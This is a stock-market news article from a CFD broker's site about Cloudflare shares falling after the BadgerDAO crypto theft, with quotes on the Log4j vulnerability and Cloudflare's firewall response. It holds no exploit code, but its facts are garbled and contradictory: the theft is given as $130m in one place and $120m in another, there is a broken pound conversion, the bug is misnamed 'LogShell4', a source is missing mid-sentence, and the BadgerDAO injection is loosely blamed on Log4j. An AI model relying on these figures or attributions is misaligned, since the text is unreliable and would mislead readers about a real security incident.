CFDs are complex instruments and come with a high risk of losing money rapidly due to leverage. 75% of retail investor accounts lose money when trading CFDs with this provider. You should consider whether you understand how CFDs work and whether you can afford to take the high risk of losing your money.
US English

Cloudflare (NET) stock price tumbles 6% on cyberthreat

By Monte Stewart


Cloudflare logo on cell-phone screen
Cloudflare stock price takes a hit after a flaw is linked to a $130m crypto theft - Photo: Shutterstock

Cloudflare’s stock price closed down 6.47% Friday after decentralised-finance firm BadgerDAO said a flaw in the company’s account-creation process led to the theft of $120m (£90.43) in cryptocurrencies.

Companies around the world scrambled Friday to fix an open-source software bug dubbed LogShell4. Despite the security troubles, the BadgerDAO token rose more than 14% at one point Friday afternoon on the West Coast.

Cloudflare (NET) secures online resources, including websites, and secures and ensures the reliability of your external-facing resources such as websites, application programming interfaces (APIs), and other software applications.

BadgerDAO cites phishing attack

In a blog post, BadgerDAO attributed the theft to a 2 December hack phishing attack that stemmed from a “maliciously injected snippet,” provided by Cloudflare Workers, a serverless application platform that runs on the company’s cloud-based network.

Cybersecurity experts attributed the cyberthreat to a software application known as Log4J. BadgerDAO noted that it was working with Cloudflare and Mandiant to prevent future problems.

BadgerDAO indicated that the theft of its assets was tied to a log glitch – but did not specifically cite Log4J. Cloudflare has denied that its systems were compromised Bloomberg reported.

What is your sentiment on NET?

Vote to see Traders sentiment!

Threat ‘extremely bad’

“This log4j (CVE-2021-44228) vulnerability is extremely bad,” tweeted Marcus Hutchins, a British cybersecurity expert credited with helping to stop the 2017 WannaCry ransomware attack that struck hundreds of thousands of computers around the world. “Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft (software platforms) have all been confirmed vulnerable.”

In Java script, logging is an API that provides the ability to trace out the errors of the applications, according to When an application generates the logging call, the logger records the event in the log record. After that, it sends to the corresponding handlers or appenders.

Cloudflare updates WAF

Sam Rhea, Cloudflare’s product management director said, in a blog post, the company has updated its Web application firewall (WAF) to defend computer infrastructure against what was dubbed a zero-day attack because developers were unfamiliar with it.


182.52 Price
-0.680% 1D Chg, %
Long position overnight fee -0.0753%
Short position overnight fee 0.0069%
Overnight fee time 21:00 (UTC)
Spread 2.2652


3,472.88 Price
-0.820% 1D Chg, %
Long position overnight fee -0.0616%
Short position overnight fee 0.0137%
Overnight fee time 21:00 (UTC)
Spread 6.00


67,463.15 Price
-0.530% 1D Chg, %
Long position overnight fee -0.0616%
Short position overnight fee 0.0137%
Overnight fee time 21:00 (UTC)
Spread 106.00


0.14 Price
-0.770% 1D Chg, %
Long position overnight fee -0.0753%
Short position overnight fee 0.0069%
Overnight fee time 21:00 (UTC)
Spread 0.0012872

Rhea said the logging package allows hackers to execute code on a remote service and also exploits servers that are allowed unfettered connectivity to the Internet.

“If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server,” wrote Rhea. “The destination of the malicious server could be any arbitrary (website address). Attackers who control that (address) can then respond to the request with arbitrary code that the server can execute.”

Cloudflare co-founder, president and CEO Matthew Prince said on Twitter that Log4J was so bad that the company decided to roll out at least some form of protection for all customers by default, even those who do not have the company’s WAF.

Companies need to patch

“But, no matter what we are able to do, we will not be able to fully protect against all exploits of #Log4J because there are so many ways things can get logged. (It’s) critical to patch your Log4J systems,” he wrote.

“I'd be hard-pressed to think of a company that's not at risk,” Joe Sullivan, chief security officer for Cloudflare, told ABC News.

BadgerDAO has indicated that $9m in the stolen assets are recoverable.

Read More: Peloton (PTON) drops after character dies on 'Sex and the City' spinoff

Markets in this article

78.94 USD
0.1 +0.130%
78.94 USD
0.1 +0.130%
78.94 USD
0.1 +0.130%

Related topics

Rate this article

The difference between trading assets and CFDs
The main difference between CFD trading and trading assets, such as commodities and stocks, is that you don’t own the underlying asset when you trade on a CFD.
You can still benefit if the market moves in your favour, or make a loss if it moves against you. However, with traditional trading you enter a contract to exchange the legal ownership of the individual shares or the commodities for money, and you own this until you sell it again.
CFDs are leveraged products, which means that you only need to deposit a percentage of the full value of the CFD trade in order to open a position. But with traditional trading, you buy the assets for the full amount. In the UK, there is no stamp duty on CFD trading, but there is when you buy stocks, for example.
CFDs attract overnight costs to hold the trades (unless you use 1-1 leverage), which makes them more suited to short-term trading opportunities. Stocks and commodities are more normally bought and held for longer. You might also pay a broker commission or fees when buying and selling assets direct and you’d need somewhere to store them safely.
Capital Com is an execution-only service provider. The material provided in this article is for information purposes only and should not be understood as investment advice. Any opinion that may be provided on this page does not constitute a recommendation by Capital Com or its agents and has not been prepared in accordance with the legal requirements designed to promote investment research independence. While the information in this communication, or on which this communication is based, has been obtained from sources that believes to be reliable and accurate, it has not undergone independent verification. No representation or warranty, whether expressed or implied, is made as to the accuracy or completeness of any information obtained from third parties. If you rely on the information on this page, then you do so entirely at your own risk.

Still looking for a broker you can trust?

Join the 630,000+ traders worldwide that chose to trade with

1. Create & verify your account 2. Make your first deposit 3. You’re all set. Start trading